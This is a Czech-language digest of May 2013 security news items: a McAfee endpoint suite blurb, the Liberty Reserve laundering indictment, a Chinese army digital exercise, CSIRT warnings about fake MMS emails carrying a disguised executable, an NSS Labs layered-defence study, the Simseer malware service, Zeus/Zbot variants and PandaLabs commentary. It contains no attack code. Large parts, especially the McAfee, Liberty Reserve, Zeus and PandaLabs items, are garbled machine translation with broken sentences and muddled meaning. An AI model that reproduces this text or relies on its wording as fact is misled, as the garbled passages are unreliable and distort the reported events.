Kompletní apartmá Endpoint Protection, které se zaměřují na všechny fáze stealth malware a neustálými útoky. Možnosti nabízené produkty zahrnuté v apartmánech McAfee Endpoint Protection: Kompletní reálném čase pro McAfee ePO - používá speciální design a nejlepší praxe Otázky a akce v rámci postupu pomoci každý správce pochopit jejich bezpečnostní situace až 1000krát rychleji, než jakýmkoli jiným způsobem, a přijmout opatření snadno a okamžitě řídit potenciální rizika. McAfee Enterprise Mobility Management (McAfee EMM) - správu mobilních zařízení a mobilní bezpečnosti dat jsou plně integrován s McAfee ePolicy Orchestrator (McAfee ePO) prostředí platformy. Díky EPO, mohou zákazníci používat jedinou tabuli skla a politiky životního prostředí řídit všechny koncové body, včetně multi-platformní Suites balíčku v smartphony, tablety, Mac, Windows a Linux. Chcete-li číst celý EMM tiskovou zprávu, dnes také oznámil, klikněte zde. McAfee Hluboká Defender - koncové body jsou chráněny před kradmé útoku pomocí společně vyvinuté společností Intel a McAfee hardware rozšířeného zabezpečení, která jde nad rámec operačního systému, ochrana, kde tradiční bezpečnostní nástroje nemohou dosáhnout. McAfee Application Control pro PC - dynamický whitelisting pro notebooky a stolní počítače snižuje riziko infekce a poruchy tím, že obsahuje aplikace, které může uživatel spustit, včetně zabránění škodlivého softwaru z provádění. Tato technologie ukázala West Coast Labs nabídnout 100% ochrana ceny s velmi nízkou režii systému. McAfee Risk Advisor - umožňuje správcům okamžitě vidět, která aktiva jsou v nejvyšším nebezpečí, aby mohli chránit nejdůležitější aktiva první a přesně.
Liberty Reserve prát 6000000000dolary prostřednictvím nelegálních transakcí 29. května 2013. Kriminalita
Obžaloba byla nezakryté v úterý nabíjení Liberty Reserve, společnost, která provozuje jeden z světa je nejvíce používaných digitálních měn služeb a sedm jejích ředitelů a zaměstnanců proti praní špinavých peněz a provozování nelicencované peníze vysílací podnikání.
Liberty Reserve je obviněn, že měl více než jeden milion uživatelů po celém světě, včetně více než 200.000 uživatelů v USA, kteří prováděli přibližně 55 milionů transakcí - prakticky všechny, které byly nezákonné - a vyprat více než 6 miliard dolarů podezření, že pochází z trestné činnosti, včetně úvěrových karta podvody, krádeže identity, investiční podvod, počítačové hackerství, dětské pornografie a narkotiky. Pět obžalovaných byli zatčeni 24. května 2013 včetně Arthura Budovsky, hlavní zakladatel Liberty Reserve, který byl zatčen ve Španělsku Vladimir Kats, na spoluzakladatel Liberty Reserve, který byl zatčen v Brooklynu, New Yorku, Azzeddine El Amin, manažer finančních účtů Liberty Reserve je, který byl zatčen ve Španělsku a označovat Marmilev a Maxim Chukharev, kdo pomohl navrhnout a udržovat Liberty Reserve technologickou infrastrukturu , kteří byli zatčeni v Brooklynu, New York, a Kostarice, resp. Další dva obžalovaní, Ahmed Yassine Abdelghani ("Yassine") a Allan Esteban Hidalgo Jimenez ("Hidalgo"), jsou na svobodě v Kostarice. Podle obvinění v obžalobě, občanského propadnutí žádosti a další dokumenty podané na Manhattanu federální soud: Liberty Reserve byla založena v Kostarice v roce 2006 a provozuje digitální měnu se běžně označuje jako "LR". Zatímco společnost účtováno sebe jako na internetu je "největší platebních procesorů a převodu peněz systémem," sloužící "miliony" lidí na celém světě, včetně USA, v žádném okamžiku se společnost zaregistrovat u amerického ministerstva financí jako peněžní vysílací činnosti, jak to vyžaduje zákon. Obžalovaní vytvořili, strukturované a provozovala Liberty Reserve jako trestný bankovní platební procesor navržen tak, aby pomáhají uživatelům provádět ilegální transakce anonymně a praní výnosů ze své trestné činnosti. To se ukázalo jako jeden z hlavních činitelů převodu peněz používají počítačoví zločinci po celém světě k distribuci, obchod a praní výnosů z jejich protiprávní činnosti. společnost rostla do finanční centrum na světě počítačové trestné činnosti, umožňující širokou škálu on-line trestní činnost, včetně podvodů s kreditními kartami, krádeže identity, investičního podvodu, počítačového hackování, dětské pornografie a obchodování s drogami. Liberty Reserve byl používán značně k nezákonným účelům, funguje jako banka volby pro podsvětí, protože za předpokladu, infrastrukturu, která umožnila počítačoví zločinci po celém světě, aby provedla anonymní a vysledovat finanční transakce. Obžalovaní také chráněny trestní infrastrukturu Liberty Reserve podle , mimo jiné, ležel na praní špinavých peněz orgány v Kostarice a předstírat, vypnout Liberty Reserve po učení společnost vyšetřován prosazování práva v USA. Oni pak pokračoval provoz podniku pomocí sady fiktivních společností, a se stěhoval desítky milionů dolarů prostřednictvím účetních závěrek shell vedených na Kypru, Rusko, Čína, Hong Kong, Maroko, Španělsko, Austrálie, a jinde. Aby bylo možné používat LR měnu , uživatel musel nejprve otevřít účet prostřednictvím webové stránky Reserve Liberty a poskytnout základní identifikační údaje. Na rozdíl od tradičních bank nebo zákonné on-line procesorů, Liberty Reserve nevyžadoval uživatelé ověřit svou identitu. Uživatelé stále založena účty pod falešnými jmény, včetně takových jmen jako nestydatě trestních "Hackers Rusko" a "Hacker účet." Jako součást vyšetřování, donucovací prostředek otevřených a popraven transakcí prostřednictvím tajného účtu u Liberty Reserve ve jménu " Joe Neskutečná "a adresa" Fake 123 Main Street "v" Zcela Made up, New York. " Jakmile je účet byl založen, může uživatel provádět transakce s ostatními uživateli Liberty Reserve. V těchto transakcí, může uživatel obdržet převody LR z účtů jiných uživatelů, a přenos LR ze svého vlastního účtu ostatním uživatelům, včetně všech "obchodníků", které přijaly LR jako platební prostředek. Liberty Reserve platí jedno-procentní poplatek až do výše 2,99 dolarů, pokaždé, když uživatel převeden LR na jiného uživatele prostřednictvím systému rezerv Liberty. Za příplatek "soukromí poplatek" 75 centů za transakci, může uživatel skrýt svůj vlastní Liberty Reserve číslo účtu při převodu finančních prostředků, účinně dělat přenos zcela nepostižitelné, a to iv rámci již neprůhledného systému Liberty Reserve je. Chcete-li přidat další vrstvu anonymita, Liberty Reserve nedovolil uživatelům financovat své účty převody peněz společnosti přímo převodem kreditní karty nebo jinými prostředky. Uživatelé také nemohl čerpat prostředky z jejich účtů přímo. Místo toho, Liberty Reserve uživatelé povinni provádět žádné vklady ani výběry pomocí třetích stran "výměníků", což umožnilo společnosti, aby se zabránilo shromažďování žádné informace o jeho uživateli prostřednictvím bankovních operací nebo jinou činnost, která by ponechala centrální finanční papíře . BUDOVSKY, Kats a EL AMINE vlastněny a provozovány určité Liberty Reserve výměníku služby. Liberty Reserve web doporučila řadu "pre-schválené" výměníků, který inklinoval být nelicencované peníze předávání podniků působících v zemích bez významného vládního dohledu praní špinavých peněz nebo regulace , jako v Malajsii, Rusko, Nigérie a Vietnamu. Výměníky účtovány transakční poplatky za své služby, které byly mnohem vyšší než poplatky účtované bankami nebo běžných platebních procesorů pro srovnatelné převod peněz. Kromě toho, že slouží ke zpracování platby za nelegálního zboží a služeb online, Liberty Reserve byl také používán počítačoví zločinci k praní výnosů z trestné činnosti a převod peněžních prostředků mezi trestné spolupracovníků. Například, Liberty Reserve používat kreditní karty a krádeže počítačových hackerů kroužků působících v zemích po celém světě, včetně Vietnamu, Nigérii, Hong Kongu, Číně a USA, k distribuci výnosů z těchto spiknutí mezi zúčastněnými členy. sedm obžalovaných jsou každý obviněn z jednoho počtu spiknutí za účelem spáchání praní špinavých peněz, který nese maximální dobu 20 let ve vězení, jednoho počtu spiknutí s cílem provozovat bez licence peníze vysílací podnik, který nese maximální dobu pět let ve vězení, a provoz určitého nelicencované peněz transmitting obchodu, který nese maximálním trestem pěti let vězení. Kromě kriminální obvinění v obžalobě bylo pět domén chytil, a to název domény Liberty Reserve a názvy domén čtyři výměník webové stránky, které byly řízeny jedním nebo více žalovaných; 45 bankovních účtů byly upoutány nebo zabavené a občanskoprávní žaloba byla podána proti 35 výměníkových webových stránek, kteří hledají propadnutí domény výměníků jmen, protože webové stránky byly použity k usnadnění Liberty Reserve praní špinavých peněz spiknutí a představují vlastnictví zapojených do praní špinavých peněz. čtyři výměníky, jejichž názvy domén byly zabaveny, stejně jako 35 výměníků, jejichž názvy domén jsou předmětem občanské propadnutí akci, byli všichni výměníky, že transakce obchod s Liberty Reserve a byli uvedeni na internetových stránkách Liberty Reserve jak "pre-schválené výměníků." Vyšetřování a takedown zapojit prosazení práva v 17 zemích, včetně Kostarice, Nizozemsku, Španělsku, Maroku, Švédsko, Švýcarsko, Kypr, Austrálie, Čína, Norsko, Lotyšsko, Lucembursko , Velká Británie, Rusko, Kanada a USA
Čínská armáda oznámila cvičení otestovat své síly digitalizovaných 29. května 2013. KyberWar
Čínské lidové osvobozenecké armády (PLA), oznámila, že uspořádá vojenské cvičení v červnu, jejímž cílem je zkoušet "nové typy bojových jednotek, včetně jednotek s použitím digitální technologie uprostřed úsilí k vyrovnání informationalized války." Cvičení se bude konat v Zhurihe výcvikové základny ve vnitřním Mongolsku autonomní oblasti, a podle státní tisková agentura Xinhua , že "bude poprvé posilovnou PLA se zaměřila o boji proti silám včetně digitalizovaných jednotek speciálních operací, armádě letectví a elektronická následná protiopatření sil. " Dva armádní sbory a osm vojenské akademie se rovněž zúčastní. zpráva přichází v návaznosti na zjevení , že čínští hackeři byli pravděpodobně za celou kampaň kybernetické špionáže, který vyústil v krádeže dokladů a provedení dvou desítek kritických amerických zbraňových systémů, a zvýšení calls politiků za účelem uložení sankcí Chinese (a další) společnosti, jejichž výrobky byly pravděpodobně částečně výsledkem z porušování práv duševního vlastnictví od společností ve Spojených státech. Za den prvního setkání Nová Čína prezident Xi Jinping a americký prezident Barack Obama se blíží, počítačové espionage a kybernetické konflikt se zdá být rychle vyšplhat až na vrchol seznamu otázek, které je třeba projednat.
Na nový virus jsou antivirové programy krátké, varují odborníci
28.5.2013 Viry Národní bezpečnostní tým CSIRT varoval před novým zákeřným virem, který nedokážou antivirové programy rozeznat. Nezvaní návštěvníci se šíří prostřednictvím podvodných e-mailů, o kterých již Novinky informovaly v pondělí.
Zvětšit obrázek FOTO: Archiv, Právo Dnes 19:17 Škodlivé kódy se šíří prostřednictvím e-mailů, které vypadají jako přeposlaná MMS zpráva. První pokusy pirátů o vniknutí do počítače dokázaly antiviry zachytit, v ohrožení tak byli výhradně uživatelé nechránění bezpečnostním softwarem.
Na novou verzi jsou ale již antiviry krátké. „Pracovníci CSIRT.CZ důrazně varují před novou verzí přiloženého viru, kterou již antivirové produkty nedokáží v současnosti rozpoznat,“ podotkl bezpečnostní analytik CSIRTu Pavel Bašta.
Útok cílí na zákazníky všech předních operátorů Podle něj navíc útočníci rozšířili své portfolio o další doménu, ze které podvodné e-maily rozesílají. „Podle informací od uživatelů bylo zaznamenáno rozesílání těchto zpráv nově také z adresy noreply@o2.com,“ uvedl bezpečnostní analytik CSIRTu.
Až doposud se přitom počítačoví piráti zaměřovali výhradně na uživatele operátorů Vodafone a T-Mobile. [celá zpráva]
Útok probíhá vždy ve stejné režii, podvodný e-mail obsahuje přílohu se souborem ve formátu ZIP. „Po rozbalení uživatel získá soubor s názvem ‚MMS_IMG 03276311.jpg.exe‘. Útočník počítá s tím, že nepozorný uživatel spustí virus v domnění, že se jedná o neškodný obrázek. Ve skutečnosti si však do počítače nainstaluje nebezpečný kód,“ varoval Bašta.
Na aktualizace se zatím čeká Je více než pravděpodobné, že s hrozbou si antivirové společnosti poradí v řádech hodin nebo maximálně dnů. Do té doby je ale více než vhodné podobné zprávy vůbec neotevírat a rozhodně do počítače nestahovat žádné přílohy.
Podobným útokům byli na konci loňského roku vystaveni uživatelé komunikační služby Skype, prostřednictvím které se šířil trojský kůň nazývaný Dorkbot. Tento nezvaný návštěvník na napadených počítačích sbírá citlivé údaje a dál se prostřednictvím infikovaného stroje šíří po internetu – lidem ze seznamu kontaktů začnou chodit zprávy nabízející nový profilový obrázek.
Podvodníci mají nový trik: na důvěřivce se snaží vyzrát přes MMS
27.5.2013 Kriminalita V posledních týdnech se v Česku stále častěji objevují podvodné e-maily, které se tváří jako přeposlaná MMS zpráva. Místo ní si ale uživatel stáhne do počítače škodlivý program. Před hrozbou varoval Národní bezpečnostní tým CSIRT.
„Zaznamenali jsme pravděpodobně další vlnu útoku na uživatele internetu v České republice. Z adresy noreply@t-mobile.cz jsou rozesílány e-mailové zprávy, které se snaží přesvědčit příjemce, že se jedná o přeposlanou MMS a že v zazipované příloze je obrázek,“ konstatoval bezpečnostní analytik Pavel Bašta z CSIRTu.
Podobným zprávám v minulých týdnech podle něj čelili také uživatelé operátora Vodafone. Falešné e-maily posílané z domény Telefóniky zatím zaznamenány nebyly. Není ale vyloučeno, že i za tohoto operátora se budou snažit podvodníci vydávat.
Největší riziko hrozí těm, kteří antivirus nepoužívají. bezpečnostní analytik Pavel Bašta Útok probíhá vždy ve stejné režii, podvodný e-mail obsahuje přílohu se souborem ve formátu ZIP. „Po rozbalení uživatel získá soubor s názvem ‚MMS_IMG 03276311.jpg.exe‘. Útočník počítá s tím, že nepozorný uživatel spustí virus v domnění, že se jedná o neškodný obrázek. Ve skutečnosti si však do počítače nainstaluje nebezpečný kód,“ varoval Bašta.
Uživatelé, kteří na svých počítačích používají a pravidelně aktualizují antivirový program, se hrozby podle bezpečnostního analytika CSIRTu obávat nemusí. Většina bezpečnostních aplikací totiž nezvané návštěvníky šířící se touto cestou odhalí. „Největší riziko tedy hrozí těm, kteří antivirus nepoužívají,“ dodal Bašta.
Vícestupňová ochrana se většinou malwaru neubrání
Bezpečnostní experti vždy doporučovali nasazování více vrstev bezpečnostních opatření, ale podle nové zprávy NSS Labs není víra v jejich účinnost tak zcela oprávněná.
Bezpečnost
NSS Labs, společnost věnující se výzkumu problematiky zabezpečení informačních technologií, vydala před týdnem další analýzu, která se zaměřila na vícevrstvou architekturu bezpečnostních opatření a technologií. NSS testovala 37 bezpečnostních produktů od 24 výrobců a instalovala je po dvojicích. Na 606 kombinací potom útočila pomocí 1711 známých konkrétních zneužití. Pouze tři procenta instalací byla schopna detekovat 100 procent útoků. Podle Stefana Freie, ředitele výzkumu NSS Labs, porovnání bezpečnostních technologií – současné generace firewallů, systémů na prevenci průniků a ochrany koncových bodů – ukázalo na „významnou korelaci selhání při detekci útoků. Takové detekční selhání je významným problémem, které musí bezpečnostní průmysl vyřešit, protože umožňuje útočníkům obejít mnoho vrstev obrany pomocí pouze malé skupiny útoků na několik chyb.“ Běžně se dosud od více vrstev bezpečnostních ochran očekávalo, že jakýsi efekt kumulace zajistí efektivnější obranu. Studie ovšem ukázala, že i když myšlenka vrstev má stále své výhody, reálné zvýšení efektivity obrany závisí na mnoha faktorech. Samozřejmě nejdůležitější je vědět, které z produktů zkombinovat. Nejčastější chybou je použití výrobků stejného výrobce. Jsou postaveny na stejné technologii a stejné bázi znalostí, což vede k tomu, že pokud jeden z produktů selže, ty doplňkové od téhož výrobce takřka jistě taktéž – k efektu navýšení bezpečnosti prostě nedochází. To je primární důvod, proč řada technologií během testů NSS Labs selhala skutečně pozoruhodným způsobem. Stejně tak je při nasazování více vrstev bezpečnosti zapotřebí mít hlubší chápání technologií a souvislostí. Je zbytečné spouštět duplicitní a identické technologie, které z principu nemohou přinést odlišný výsledek. Zbytečně to přetěžuje jednotlivé síťové prostředky a při vysokých nákladech nepřináší nic jiného než pocit zvýšené bezpečnosti.
Skener identifikuje malware kmeny, může být budoucnost AV 24.05.2013 Viry
Pokud jde jen na hledání malwaru, podpis na bázi odhalování, heuristice a cloudové uznávání a sdílení informací používá mnoho antivirových řešení dnes fungují bez problémů do určité míry, ale polymorfní malware ještě dá jim běžet za své peníze. Na roční AusCert konferenci tento týden v Austrálii doktorát z kandidátů Deakin University v Melbourne představila výsledky svého výzkumu a práce, které to může být řešením tohoto problému. Bezpečnostní výzkumník Silvio Cesare si všiml, že malware kód se skládá z malých "struktur", které zůstávají stejné i po mírné změny v jeho kódu. "Použití struktur, můžete zjistit přibližné shody škodlivého softwaru, a to je možné vybrat celou rodinu škodlivého softwaru docela snadno jen s jedné struktury," řekl sdílet s ČSÚ Austrálii. Tak on vytvořil Simseer , zdarma on-line služba, která provádí automatickou analýzu předložených vzorků malwaru a řekne a ukáže vám, jak podobné jsou na jiné předložených vzorků. To skóre podobnosti mezi malware (jakýkoliv druh softwaru, opravdu), a to grafy výsledků a vizualizuje programu vztahy jako evolučního stromu. Jestliže vzorek obsahuje méně pak 98 procent podobnost s již existující malware kmene, dostane vzorek katalogizovány jako zcela nový kmen. Podle webové stránky, Simseer detekuje malware tok řízení, kterým se mění mnohem méně než řetězec podpisů nebo podobné funkce a polymorfní a metamorfovaných malware varianta obvykle sdílejí stejný tok řízení. To běží na clusteru Amazon EC2 s tucet nebo tak virtuální servery, a je "krmil" od Cesare každý večer GB malware kódu stažené z jiných volných zdrojů, jako VirusShare. Zatím Simseer identifikoval více než 50.000 kmeny škodlivého softwaru a počet stále roste. Cesare se stále pracuje na zdokonalování služeb, a doufá, že pomůže malware analytikům jejich výzkumu. Pro tuto chvíli, jeho použití je zdarma pro každého. To je zajímavé poznamenat, že tato služba je schopen více než jen odhalení a katalogizace vzorků malwaru. Jak již bylo řečeno, že pracuje na nějakém druhu softwaru, a mohou být použity pro plagiátorství a software krádeže detekce, stejně jako reakce na události.
Zeus varianty jsou zpět s pomstou 24.05.2013 Viry
Po analýze zpětné vazby od společnosti Smart Protection Network, Trend Micro vědci zaznamenali vzestup pokusů Zeus / Zbot Trojan infekce.
Poté, co byl prakticky neexistuje v lednu, květnu zbytek měsíce až do začátku svědky souvislou nárůst počtu pokusů Zeus / Zbot Trojan infekce, odborníci Trend Micro poukázal. Hlavním cílem malwaru je stejná jako předtím:. krade jakýkoliv typ on-line pověření, včetně těch pro uživatele internetového bankovnictví, a jakékoliv osobní informace, které by mohly být užitečné pro trestně-smýšlejícími jednotlivci Stále, novější varianty byly trochu změnil (ne že by to v konečném důsledku záleží . mnoho obětí) Nyní vytvořte dvě různé složky v systému: kdo schoval svou kopii a druhou hostit ukradený a šifrované informace a konfigurační soubor se stáhnout ze vzdáleného serveru. Co bylo dříve dát do jedné složky v systému Windows " % System% složce je nyní k náhodné pojmenovaných složek v % dat aplikací% složky. "Zbot malware z této generace se zjistí, že většinou jeden Citadela nebo GameOver varianty. rozdíl od starší verze , název mutex je náhodně generováno, "výzkumníci poukázal . "Obě varianty posílat DNS dotazy randomizovaných doménových jmen. Rozdíl ve variantě GameOver je, že otevře náhodný port UDP pakety a posílá encrypted před odesláním DNS dotazů randomizovaných doménových jmen." Konfigurační soubory jsou, jako obvykle, se mohou změnit v závislosti na ., které informace se útočníci chtějí ukrást, a malware stále snaží, aby se zabránilo prohlížeče od bytí schopného navštívit zabezpečení stránky "Co se můžeme naučit od Zeus / Zbot bodec v posledních měsících je jednoduchý: staré hrozby jako Zbot vždy na scénu, protože zločinci těží z nich, "vědci varují a radí:" Je důležité být opatrní při otevírání e-mailových zpráv nebo kliknutím na odkazy Bookmark důvěryhodné weby a vyhýbají se návštěvám neznámých ty Udržujte svůj systém up-to-data s nejnovější aktualizací zabezpečení.. od výrobců a dodavatelů bezpečnostních a nainstalovat důvěryhodný pro boj s malware ochranu. "
Boj proti počítačové kriminalitě je na správné cestě 24.05.2013 Kriminalita
Navzdory mnoha bezpečnostních incidentů, které se odehrály v průběhu prvního čtvrtletí tohoto roku, boj proti počítačové kriminalitě je na správné cestě, podle PandaLabs.
Ačkoli tam je ještě dlouhá cesta, mezinárodní spolupráce mezi bezpečnostními složkami se vyplácí a zločinci po celém světě jsou postaveni před soud. "Začátek roku byl svědkem vážné kybernetické útoky, včetně neoprávněné vniknutí na Twitter účty velkých organizací, jako je BBC nebo Burger King, a jeden z největších útoků vůbec, cílení některé z předních světových technologických společností:. Apple, Facebook, Microsoft a Twitter, ale došlo k vítězství bezpečnostních sil stejně, včetně zatýkání skupiny hackerů obviněni z vydírání pomocí nechvalně známé "Policie Virus '," řekl Luis Corrons, technický ředitel PandaLabs. podvody policie virů Jedním z nejvíce neslavných případech malwaru v loňském roce bylo "policie Virus, "Ale v únoru, tento virus znovu do novinových titulků, ale z úplně jiného důvodu. Technologické Vyšetřování brigáda národní policie ve Španělsku, spolu s Europolem a Interpolem, rozebral počítačová trestná činnost kroužek odpovědný za policejní Virus. "novinky zmínil zatčení" gang "kybernetické zločince, ale informace, které máme v PandaLabs poukazuje na existenci několika gangů odpovědných za tyto útoky. Došli jsme k tomuto závěru po analýze četné varianty malwaru v průběhu času, a pozorovat významné rozdíly mezi nimi. Stručně řečeno, máme strach, že policie Virus není pravděpodobné, že odejít v dohledné době a uživatelé by neměli snižovat své stráže, "řekl Corrons. Sociální média útoky průběhu 1. čtvrtletí byly různé Twitter účty také hacknutý, včetně osobností a společností, jedna z nejpozoruhodnějších byl Burger King. Útočníci se podařilo přijít na heslo k účtu a převzít kontrolu nad účtu. Změnili obrázek na pozadí, který McDonald a tvrdil, že společnost převzala svého hlavního konkurenta. účet Twitter z džípu automobilky byl také obětí podobného útoku, v tomto případě o tom, že společnost byla odkoupena Cadillac. Další útoky na účtech Twitter měl více politický ráz. skupina kybernetických podvodníků volat sebe "syrskou armádu" Electronic podařilo proniknout účty náležející několika organizací. Phishing útoky byly poprvé zahájeny získat hesla a účty byly unesena. Jejich oběti zahrnovaly Human Rights Watch, francouzský zpravodajský kanál France 24 a BBC počasí služby. Android, nejvyšší cíl pro mobilní malware Téměř všechny novinky týkající se malware útoky na mobilní platformy zúčastněných operačního systému Android, který má největší podíl na tomto trhu. Kromě obvyklých útoků, toto čtvrtletí se nové techniky, které si zaslouží zmínku. Kmen Android malware - skrývá Google Play -. Nejen infikované mobilní telefony, ale může také infikovat počítače přes smartphony a tablety podle Corrons, cyber-válka a špionáž se stává zajímavější. "Mnoho zemí se podezřívavě na Čínu ohledně jeho zapojení do podezřelé útoky na velkých organizací a veřejných institucí po celém světě, a to by mohlo vést k reálných následků. Existují lidé, kteří tvrdí, mezinárodní smlouvy, druh Ženevské úmluvy, aby se pokusili stanovení limitů na těchto aktivit, "řekl.